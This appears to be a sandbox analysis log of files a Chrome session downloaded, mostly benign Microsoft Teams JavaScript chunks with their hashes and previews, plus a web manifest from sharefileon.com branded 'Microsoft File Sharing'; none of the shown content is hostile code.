                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[914945],{593279:(e,n,t)=>{t.d(n,{i:()=>a});var r=t(888846),i=t(240364),o=t(504158),a=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{isCircularNavigation:!0,shouldFocusInnerElementWhenReceivedFocus:!0,direction:e.vertical?r.E.vertical:r.E.horizontal}},childBehaviors:{item:i.b,divider:o.d}}}},504158:(e,n,t)=>{t.d(n,{d:()=>r});var r=function(){return{attributes:{root:{role:"presentation"}}}}},240364:(e,n,t)=>{t.d(n,{b:()=>o});var r=t(953543),i=t(504405),o=function(e){var n;return{attributes:{wrapper:{role:"presentation"},root:(n={role:"menuitem",tabIndex:0,"aria-expanded":e.hasMenu?e.menuOpen||!1:void 0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-disabled":e.disabled},n[i.P]=!0,n)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Ente
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):79350
                                                                                                                                                                                                                          Entropy (8bit):4.361667020708487
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:JyFDl5rfjPfLO9InrulCCVfCLHaS29dbb3NbyH4IxnV94Jy:JurfnTCVfmHaS29dbb3dyH4I6y
                                                                                                                                                                                                                          MD5:B4D415B263C182DB54F9262709BE4FD7
                                                                                                                                                                                                                          SHA1:6C659EC1CD040E16F6CFFB51BEC5EADD2599C6D1
                                                                                                                                                                                                                          SHA-256:50F0B4ADA66B0150FDD49F92EC770B29AD1D73A2CA0C62E0BD982C63F2CD447B
                                                                                                                                                                                                                          SHA-512:E0662D53C739252E0F4CF5743B610AE9AEB80CC69F6800F95B99426431C4932EDA8C6E0DD135DEB8C26F5F1B8E15005813AB0EBFE8EC96CE0368BDC1F9502BCF
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/941359-9026e0bb33bc2d9d.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[941359],{941359:(a,l,Z)=>{Z.d(l,{fSE:()=>h,TP9:()=>m,LSe:()=>e,v9w:()=>v,y2B:()=>M,cbT:()=>H,zb1:()=>V,nY7:()=>A,SXh:()=>i,Qi2:()=>L,xkB:()=>U,xHU:()=>r,wDt:()=>d,GqH:()=>g,ma3:()=>u,yKV:()=>t,EAE:()=>o,wIE:()=>F,F8W:()=>n,n_S:()=>R,ba$:()=>C,dMU:()=>s,ILi:()=>f,chi:()=>b,Aig:()=>p,EEN:()=>I,MLu:()=>O,mUJ:()=>k,xG7:()=>G,bio:()=>S,l8b:()=>N,B7m:()=>z,EMy:()=>E,kOy:()=>_,nYd:()=>w,bL$:()=>y,Q_I:()=>B,IMc:()=>D,OJr:()=>K,ipe:()=>P,h19:()=>T,XN6:()=>x,BYz:()=>Q,Bj:()=>Y,$RO:()=>X,Ftl:()=>j,fbj:()=>q,nKf:()=>J,TkK:()=>$,pO8:()=>W,Lin:()=>aa,nT:()=>la,oCE:()=>Za,K$r:()=>ca,M1Y:()=>ha,O0v:()=>ma,SH1:()=>ea,AqR:()=>va,Hzn:()=>Ma,t1F:()=>Ha,SrQ:()=>Va,a3S:()=>Aa,_Vr:()=>ia,QQo:()=>La,BBu:()=>Ua,Bul:()=>ra,uk7:()=>da,YFz:()=>ga,$jj:()=>ua,$4h:()=>ta,PHn:()=>oa,z4P:()=>Fa,N_H:()=>na,BFD:()=>Ra,YXI:()=>Ca,gTi:()=>sa,spK:()=>fa,wJr:()=>ba,sNG:()=>pa,gZ8:()=>Ia,B8A:()=>Oa,pLc:()=>ka,r43:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (652)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):765
                                                                                                                                                                                                                          Entropy (8bit):5.403587201614664
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:/4p3sp38VFlHKVqZhZbZ9XVPBnMzHoFsnbFIJFse+mMcQZgDhsDzrhV2zLWEZJgJ:wp3sp38fNVj179BnMDwyKJFse+mMcQ5j
                                                                                                                                                                                                                          MD5:54D48CA40676CE5F69A75299285057CB
                                                                                                                                                                                                                          SHA1:A966259EFE700E5AC0CDDE0011BCAFB996E7AFF7
                                                                                                                                                                                                                          SHA-256:AA84EC5E9B9AE3037FC966D7B72208A6CD18649BBA5F74595724176370025EC1
                                                                                                                                                                                                                          SHA-512:70212CD3140E22187EE307F37EAC0A069848243762C86FB76747AF532035B299250C7A32E2B7CAF5648009DFD5991F73B52118218B6AF23A618767C291875E9C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/data-schema-0ac7440254a0a997.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[893369],{168570:(e,a,r)=>{r.r(a),r.d(a,{ClientSchema:()=>s,Schema:()=>n,ServerSchema:()=>t,resolvers:()=>i.u,typeDefs:()=>c});var t={};r.r(t);var s={};r.r(s);var n={};r.r(n);var c=r(876152),i=r(701426)},701426:(e,a,r)=>{r.d(a,{u:()=>n});var t=r(425104),s=r(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new t.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.map
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):479
                                                                                                                                                                                                                          Entropy (8bit):5.136231023935849
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:YWGhtXIoWFJsTPX3QJPwTPX3QIjf2I4Rgf2I7Jx:YZXIoWofwPofFfSgfJJx
                                                                                                                                                                                                                          MD5:8B1CFD39D9C27229BD688E27EEE2E76B
                                                                                                                                                                                                                          SHA1:CF317C7E48DF6BB7169011E2C3016BCC62D55327
                                                                                                                                                                                                                          SHA-256:3CFD57DAD1885AF310975AA0A0DF9C1A3F854255769534D4166173E920B338C9
                                                                                                                                                                                                                          SHA-512:0E4EDB8486D0285999B670A2C1AE038908BFB6E0162FBE803CD912B4E9B7C32BCA334BEBED088C6A16BBF9C42F1BE9ADD57673A776789B774101A30EA7FEAF27
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://sharefileon.com/manifest.webmanifest
                                                                                                                                                                                                                          Preview:{"scope":"/","start_url":"/","display":"standalone","icons":[{"sizes":"192x192","type":"image/png","src":"//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-92f0eb4.png/:/rs=w:192,h:192,m"},{"sizes":"512x512","type":"image/png","src":"//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-92f0eb4.png/:/rs=w:512,h:512,m"}],"name":"Microsoft File Sharing","short_name":"Microsoft File Sharing","theme_color":"#17586d","background_color":"#17586d"}
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9167)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):9275
                                                                                                                                                                                                                          Entropy (8bit):4.510710251595788
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:DAi0z2jGpS76h5H2VtCdYkVQTWh3+cjTnQ03SiVtB9jJj:N0z2jGpSq5H2VtCdYnlc/HSiVtvF
                                                                                                                                                                                                                          MD5:2EB77E310EAEE79E0D7C1355B3BEFF5B
                                                                                                                                                                                                                          SHA1:8B3A438962114E5815D13018AAA04000BA6EE69F
                                                                                                                                                                                                                          SHA-256:957483AE90B62F6E44072EB51C20E693A5B6B57CC34D763AFA3EB42A658B9DFD
                                                                                                                                                                                                                          SHA-512:98F3F4ADCA9FA49812B538747644A105C1AC1DFCF9FFD120BB7B5772FC6F0917B4FCD87C76FBFC8289DABE77385A62CD5E3F0B0E2E9902BD35E0F8DE163C72A9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/698386-08e4f521fff06ec5.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[698386],{698386:(a,l,Z)=>{Z.d(l,{aRN:()=>c,c8N:()=>v,WXH:()=>h,g0L:()=>H,NL$:()=>e,vrP:()=>m,vNW:()=>A,fEx:()=>V,faZ:()=>L,$8m:()=>i,N6m:()=>U,gMM:()=>o,k8t:()=>r,uJg:()=>u,lnn:()=>n,dAI:()=>g,Tv4:()=>t,$b4:()=>R,lDF:()=>d,OEH:()=>k,uwA:()=>s,CSI:()=>I,iCA:()=>C,IJL:()=>F,GOF:()=>f,ozV:()=>p});var M=Z(693935);const c=(0,M.U)("Info12Filled","12",["M11 6A5 5 0 1 1 1 6a5 5 0 0 1 10 0Zm-5.5.5V8a.5.5 0 0 0 1 0V6.5a.5.5 0 0 0-1 0ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),v=(0,M.U)("Info12Regular","12",["M5.5 6.5a.5.5 0 0 1 1 0V8a.5.5 0 0 1-1 0V6.5ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm5-4a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),h=(0,M.U)("Info16Filled","16",["M8 1a7 7 0 1 1 0 14A7 7 0 0 1 8 1Zm0 5.25a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm.5 1.25a.5.5 0 0 0-1 0v3a.5.5 0 0 0 1 0v-3Z"]),H=(0,M.U)("Info16Regular","16",["M8.5 7.5a.5.5 0 1 0-1 0v3
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (53670)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):53798
                                                                                                                                                                                                                          Entropy (8bit):5.230039416671407
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:S+yEFdQ+a4BitfPsk2lvRCkl67sCtbK6xYSZdj6qYMvnshwdWeMg3r:1dsFsk2lLc1Zb
                                                                                                                                                                                                                          MD5:4305A98733CD8A3B3F365BDEEECF0249
                                                                                                                                                                                                                          SHA1:D62D1C89267292689AD19BAF36141BD68505FABF
                                                                                                                                                                                                                          SHA-256:5475C34EA8E2478D7C44EF365C2F476DC80C26DDEA2099A13006AD383F35A523
                                                                                                                                                                                                                          SHA-512:65FA7A5E8DE9BF97FC0E366E768B877C2F9A85D5780ED18341B6AF878D5E9B0DDAE058F58A0291C731A9492FEA40DB463B22952D1B2D0B71E9DF0A1DC228AB0D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[420340],{944244:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===s}(e)}(e)};var s="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function r(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((s=e,Array.isArray(s)?[]:{}),e,t):e;var s}function i(e,t,s){return e.concat(t).map((function(e){return r(e,s)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function o(e,t){try{return t in e}catch(e){return!1}}function l(e,t,s){var i={};return s.isMergeableObject(e)&&n(e).forEach((function(t){i[t]=r(e[t],s)})),n(t).forEach((function(n){(function(e,t){ret
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47805)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):47913
                                                                                                                                                                                                                          Entropy (8bit):5.382366921986537
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:SUpJLd/iN3A5JewIE2c4mF4CJKtD50g+SaranNE3DjeKH1b:ZLdmKpIEtr9gqranu3DqKH1b
                                                                                                                                                                                                                          MD5:334DDD74DD7F780C7829E4EAC83CDFF6
                                                                                                                                                                                                                          SHA1:0993A41A48093AFCB5F82C25F43AE6A7279EC815
                                                                                                                                                                                                                          SHA-256:7742AE0803C92EEEDCA7F31AE73A7CAF0D53AEE1A5553FCF633414B1D1AE22CE
                                                                                                                                                                                                                          SHA-512:8D863E8319BD9B583C767104A8DD88B846D0B8D01892C7D3DBC3CA7FBBB5BF026F17CBB83767FBD4B183AE555C74B3F141C86519AF9B2AAB3A9ED1FB45E6D0C1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[192699],{504405:(e,t,n)=>{n.d(t,{P:()=>r,C:()=>o});var r="data-is-focusable",o="data-disable-click-on-enter"},888846:(e,t,n)=>{n.d(t,{l:()=>r,E:()=>o});var r=function(e){return e[e.none=0]="none",e[e.all=1]="all",e[e.inputOnly=2]="inputOnly",e}({}),o=function(e){return e[e.vertical=0]="vertical",e[e.horizontal=1]="horizontal",e[e.bidirectional=2]="bidirectional",e[e.bidirectionalDomOrder=3]="bidirectionalDomOrder",e}({})},953543:(e,t,n)=>{n.d(t,{kR:()=>f,ZG:()=>c,QC:()=>i,rC:()=>s});var r={3:"Cancel",6:"Help",8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",28:"Convert",29:"NonConvert",30:"Accept",31:"ModeChange",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",41:"Select",42:"Print",43:"Execute",44:"PrintScreen",45:"Insert",46:"Delete",48:["0",")"],4
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (30489)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):30597
                                                                                                                                                                                                                          Entropy (8bit):5.36114233090183
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J+fPoXF4ikn1Fd9nZTBJCda5tgMRillf5xeO55XqqRCRWtcNH4oYJF:KW6U8TwAQb
                                                                                                                                                                                                                          MD5:B34B6A1930919E2D8AD388FEA65E6E64
                                                                                                                                                                                                                          SHA1:F43E4975CFE5BEA3EB9298FEBC37BCB333582026
                                                                                                                                                                                                                          SHA-256:97E8A6EA62E0062C54C0D755509DD5F9ACF2C4C41297170AC361EDF1FD882D43
                                                                                                                                                                                                                          SHA-512:2B0C9CF798816C5ECDD5CF056130EAA4ED4D5AA4C92A341A43C35B788EEF9C0FFC3C876C28A9D96A97BA6FE1C96A7FAF403B95C69665CF6D578C28F2A02676AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[233940],{626388:(e,t,r)=>{var n;function o(e){return!!e&&e<7}r.d(t,{p:()=>n,b:()=>o}),function(e){e[e.loading=1]="loading",e[e.setVariables=2]="setVariables",e[e.fetchMore=3]="fetchMore",e[e.refetch=4]="refetch",e[e.poll=6]="poll",e[e.ready=7]="ready",e[e.error=8]="error"}(n||(n={}))},422816:(e,t,r)=>{r.d(t,{M:()=>i,K:()=>s});var n=r(383851),o=(r(360418),r(852965));function i(e){return e.hasOwnProperty("graphQLErrors")}var s=function(e){function t(r){var n,i,s=r.graphQLErrors,a=r.clientErrors,c=r.networkError,u=r.errorMessage,l=r.extraInfo,d=e.call(this,u)||this;return d.graphQLErrors=s||[],d.clientErrors=a||[],d.networkError=c||null,d.message=u||(n=d,i="",((0,o.E)(n.graphQLErrors)||(0,o.E)(n.clientErrors))&&(n.graphQLErrors||[]).concat(n.clientErrors||[]).forEach((function(e){var t=e?e.message:"Error message not found.";i+="".concat(t,"\n")})),n.networkError&&(i+="".concat(n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41662)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):41778
                                                                                                                                                                                                                          Entropy (8bit):5.360363617158387
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gpYFYfTpWdL/In2MB1TU6EIQRNrPzaNfrfAxETtp27EFF9V9LfiTXIDLJqoGBwr:gpkYfId4D0ExYoFfiTXkFq7a
                                                                                                                                                                                                                          MD5:38B448E73F0207EDB8A49DA72943D515
                                                                                                                                                                                                                          SHA1:4B761C3BD552A524946DDEBEF41D392E4606EC14
                                                                                                                                                                                                                          SHA-256:019D358A1E21F5B6F1FDE5482EEEF12051D85E374A48A35559108FC1FD3920F1
                                                                                                                                                                                                                          SHA-512:2F5F3245B57FCAFC06A3CA95D068A60A28A94861A821B3E1DADC3EA6D3C134F0B6BF472B27683D01F66DB53BB921C3D6D318029D3865CC7E74808E254D028D2C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/204348-6c2a726c296c1d1e.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[204348],{941974:t=>{t.exports=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},t.exports.__esModule=!0,t.exports.default=t.exports},749712:t=>{function e(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}t.exports=function(t,i,n){return i&&e(t.prototype,i),n&&e(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t},t.exports.__esModule=!0,t.exports.default=t.exports},238752:t=>{t.exports=function(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t},t.exports.__esModule=!0,t.exports.default=t.exports},434192:(t,e,i)=>{var n=i(71012);t.exports=function(t,e){if(null==t)return{};var i,r,o=n(t,e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(t);for(r=0;r<s.length;r+
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3666)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):3774
                                                                                                                                                                                                                          Entropy (8bit):5.548756589394929
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:HGRm7M6x8TOsdyjLi+i2+iX334q269Q3WOpTiW03f:HGRm7M6mTOLi3WNQ3VixP
                                                                                                                                                                                                                          MD5:67B134A86A1BED63678A879F6C3B59A0
                                                                                                                                                                                                                          SHA1:6B8D7926C3D55680EAE35CA01B79852F46378890
                                                                                                                                                                                                                          SHA-256:FF6874070AE590ED1317FE686388DD599E44B646715E3B6A9621C388490C28A5
                                                                                                                                                                                                                          SHA-512:82FAB2F7E52337E653466F1BF3DC1D5A9A802AAE9CA83D21224F9F01A8BA11441262CE413A86FCD946EBC0D68F8405AB0947FB778EB42269D5FE67057125CC77
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[699899],{699899:(e,t,n)=>{n.d(t,{BM:()=>N,Ps:()=>T,kJ:()=>I});var r=n(189687),i=n(425104);n(296920),n(132786);const a=e=>e%4==0&&e%100!=0||e%400==0,s=e=>/^([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e),o=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01]))$/.test(e))return!1;const t=Number(e.substr(0,4)),n=Number(e.substr(5,2)),r=Number(e.substr(8,2));switch(n){case 2:return!(a(t)&&r>29)&&!(!a(t)&&r>28);case 4:case 6:case 9:case 11:if(r>30)return!1}return!0},c=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])T([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]|60))(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e))return!1;const t=Date.parse(e);if(t!=t)return!1;const n=e.indexOf("T"),r=e.substr(0,n),i=e.substr(n+1);return o(r)&&s(i)},u=e=>{const t=e.getTime();return t==t},p=e=>new Date(e),l={n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4986)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):5094
                                                                                                                                                                                                                          Entropy (8bit):5.51636181102733
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:zpBCu/dgCYkjwLiTSbTkiwO1z7zFrbl4tZDrEshgPgEeLQM/YLFu4a:zpmmjwLiTSbTkiF5PKDrEVIEeUUYxun
                                                                                                                                                                                                                          MD5:B65450E5E3BDED5E0DF059CF41E27EF8
                                                                                                                                                                                                                          SHA1:C5A12EAF609A083B7542CD3AC429E550665CAB53
                                                                                                                                                                                                                          SHA-256:8AE92D7478043DA693389A9C139FCDBE4FED242CD318BB10EB645BF0F4DCD548
                                                                                                                                                                                                                          SHA-512:051B0BCD140770FF42CCD224F4905CFA55422008AB5DA3A714C469CD4BFB9B3D61017FCAB41AA57635E74325D7439E560E171CE562503A9B4D3F88B57B58089F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/986559-4ca7a71999c4c275.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[986559],{926751:(e,n,t)=>{var r;t.d(n,{B:()=>r}),function(e){e.AuthFailed="AuthFailed",e.AuthResolveFailed="AuthResolveFailed",e.BaseUrlFailedToResolve="BaseUrlFailedToResolve",e.BaseUrlTimeout="BaseUrlTimeout",e.CustomTelemetryFailed="CustomTelemetryFailed",e.FailedToFetch="FailedToFetch",e.InvalidCancellationToken="InvalidCancellationToken",e.InvalidParameters="Invalid pararameters",e.InvalidUrl="InvalidUrl",e.ModelFailedToInitialize="ModelFailedToInitialize",e.ModelTimeOut="ModelTimeOut",e.NotImplemented="NotImplemented",e.RejectHttpError="RejectHttpError",e.RequestCancelled="RequestCancelled",e.RequireStatusFailed="RequireStatusFailed",e.TimedOut="TimedOut",e.TransformFailed="TransformFailed"}(r||(r={}))},72909:(e,n,t)=>{function r(e){return new Promise(((n,t)=>{e<0?t(new Error("negative timeout")):setTimeout(n,e)}))}t.d(n,{y:()=>r})},355515:(e,n,t)=>{t.d(n,{GQ:()=>o,E2:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):304
                                                                                                                                                                                                                          Entropy (8bit):5.609970428503769
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:FSPOhWNjZTivBSyv5F/kpIdiEjGWF+ktxRmGHr9EJiKWaEkWNjZTiKF:cUZBSyv5ZdihWF+CRTHr+pWTkAF
                                                                                                                                                                                                                          MD5:DAA79AD7558674F6A12D962ABF47F2F6
                                                                                                                                                                                                                          SHA1:03EEA0EBEBD11EC14CFA5A651EB0ACA2604829A7
                                                                                                                                                                                                                          SHA-256:604281887CD770ED21601933E9636A7A9C8A57A30D7D796AE7D760EEF64D5089
                                                                                                                                                                                                                          SHA-512:B335EBCB0C982398C56D9A5F68F5D4E36A850AB139976BD94354C7CD18F1F370866A74F46FCD399F46E410D59AF7FBA890A17003BB4FD456DD43A6DE531D28F9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-searchFormLocations-c86f2a99.js",["exports"],(function(o){"use strict";o.D="DESKTOP_NAV_COVER",o.M="MOBILE_NAV",o.N="NAV_DRAWER",o.S="SIDEBAR",o.a="DESKTOP_NAV"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-searchFormLocations-c86f2a99.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33656)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):33764
                                                                                                                                                                                                                          Entropy (8bit):5.60156438987075
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:uaEXiN3NpnQ2o+H7RyZTG76kQ3vIJ7lulJbjlNUXM0PSro5h/mF0nDS9w7fv/hxj:uKN3NpnQ2oY8pG7G3vabDJj0zytd
                                                                                                                                                                                                                          MD5:D010EF6AEC4927AB3BB5049C00D70842
                                                                                                                                                                                                                          SHA1:9D23110792583AAF46063E62006CFF812A81549A
                                                                                                                                                                                                                          SHA-256:9FF10088E9376E32B8657F7B51092829F068D89B65B8AF472AF59C87A82DD68A
                                                                                                                                                                                                                          SHA-512:243BE3C3E79BE17165A2B7561E8534997DD57B9B04E314544965378CA1BC4E01F0BDFA8A5AD63C3F67D7F2DD724F775ABDD55B0D9F082FDFD5969C5514854081
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/900516-ca863ef1d4e5aa90.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900516],{111631:(e,t,r)=>{function i(e,t){var r=t&&t.cache?t.cache:l,i=t&&t.serializer?t.serializer:u;return(t&&t.strategy?t.strategy:a)(e,{cache:r,serializer:i})}function n(e,t,r,i){var n,s=null==(n=i)||"number"==typeof n||"boolean"==typeof n?i:r(i),o=t.get(s);return void 0===o&&(o=e.call(this,i),t.set(s,o)),o}function s(e,t,r){var i=Array.prototype.slice.call(arguments,3),n=r(i),s=t.get(n);return void 0===s&&(s=e.apply(this,i),t.set(n,s)),s}function o(e,t,r,i,n){return r.bind(t,e,i,n)}function a(e,t){return o(e,this,1===e.length?n:s,t.cache.create(),t.serializer)}r.d(t,{A:()=>i,W:()=>h});var u=function(){return JSON.stringify(arguments)};function c(){this.cache=Object.create(null)}c.prototype.get=function(e){return this.cache[e]},c.prototype.set=function(e,t){this.cache[e]=t};var l={create:function(){return new c}},h={variadic:function(e,t){return o(e,this,s,t.cache.create(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (51963)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):52070
                                                                                                                                                                                                                          Entropy (8bit):5.432819376714012
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:XThOnPn9ptfsLRuSIpWAunOXff4VgsLA6Ch/dY5psGEAB9F8hH9dqH9gnoYkCIKA:y9ptfMuSIpWAunafgukt58hHfjh0jR
                                                                                                                                                                                                                          MD5:408275248AC2B22A149FC9ADFA8A253E
                                                                                                                                                                                                                          SHA1:3013438C6B14A0D39F8DAB60ED2BBB3E7791CF83
